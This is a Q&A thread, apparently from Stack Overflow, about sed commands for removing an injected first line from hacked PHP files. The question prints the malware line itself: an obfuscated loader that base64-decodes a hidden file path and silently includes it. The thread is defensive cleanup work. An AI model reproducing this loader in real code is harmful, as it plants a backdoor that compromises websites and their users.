# Remove the first line with sed with a regular expression

Tags: linux, sed, grep

I want to remove the first line in all files that have match with the next grep command:

```
grep -Rl '<\?php /\* <!-----.*/\?>' ./
```

These files were hacked and I want to remove this line.
I tried with several commands with "sed" but with no result, commands like this:

```
sed 's/<\?php /\* <!-----.*/\?>//g' ./*
```

Thanks, best regards.

Edit. Example:

```
<?php /* <!-----sSMiRuomIZgafwAFrWqzLk-----> */ $SVjFIagfCmbDNLrO = base64_decode("L2hvbWUvZmVybmFuNi9wdWJsaWNfaHRtbC9QSFBMaXN0L2FkbWluL0ZDS2VkaXRvci9lZGl0b3IvZGlhbG9nL2Zja19zcGVsbGVycGFnZXMvc3BlbGxlcnBhZ2VzL3NlcnZlci1zY3JpcHRzLzIzMWE5ZDFhMGVmODM1NTEwNjdhMTY1YmU3ZmI4M2Zka2l4b3JscXZ1YiawaHX=");  @include_once $SVjFIagfCmbDNLrO;/* <!-----sSMiRuomIZgafwAFrWqzLk-----> */?><?php
defined('_JEXEC') or die('Direct Access to this location is not allowed.');

/**
```

And only whant to remove from `<?php /*....` to `*/?>`

Comment: Note that asterisk (`*`) is also a quantifier. The following regex works here: `sed '1 s/<?php.*\*\/?>//'`.

Answer (score 4):

What you want is:

```
sed -i.ORIG '1 { /YOUR_REGEX_PATTERN/d ; }' INPUTFILES*
```

This operates only on the first line, and if it matches your pattern, deletes it (in place, and the original files are backed up with `.ORIG` extension).

*Update:*

If you only want to remove some part of the first line:

```
sed -i.ORIG '1 { /YOUR_REGEX_PATTERN/s/YOUR_REGEX_PATTERN// ; }' INPUTFILES*
```

In your case it might be:

```
sed -i.ORIG '1 { /<?php \/\*.*\/?>/s_<?php /\*.*<?php_<?php_ ; }' INPUTFILES*
```

But that will work only in some cases... e.g. the `<?php` could occur in the encoded string part... (might occur...). And sed does not support non greedy and/or look-ahead, look-behind regexes...

Comment: I tried with:
sed -i.ORIG '1 { /<\?php /\* <!-----.*/\?>/d ; }' example.php
And the terminal says:
sed: -e expression #1, char 14: unknown command: `\'

Comment: @Carlos: you need to escape the slash (`/`) in your pattern. Escaped question marks are interpreted as quantifiers, so you should also replace `\?` with `?`.

Comment: @Thor Thanks, now works but it also removes others characters in the first line. In my case is:
'<?php /* <!----- RANDOMCONTENT -----> */?><?php'
And it remove also the final '<?php'

Comment: @Carlos: add some example input and expected output to your question.

Comment: @Thor In the main question I have written an example.

Comment: @ZsoltBotykai yes, because it always appears in the first line, sorry for the mistake.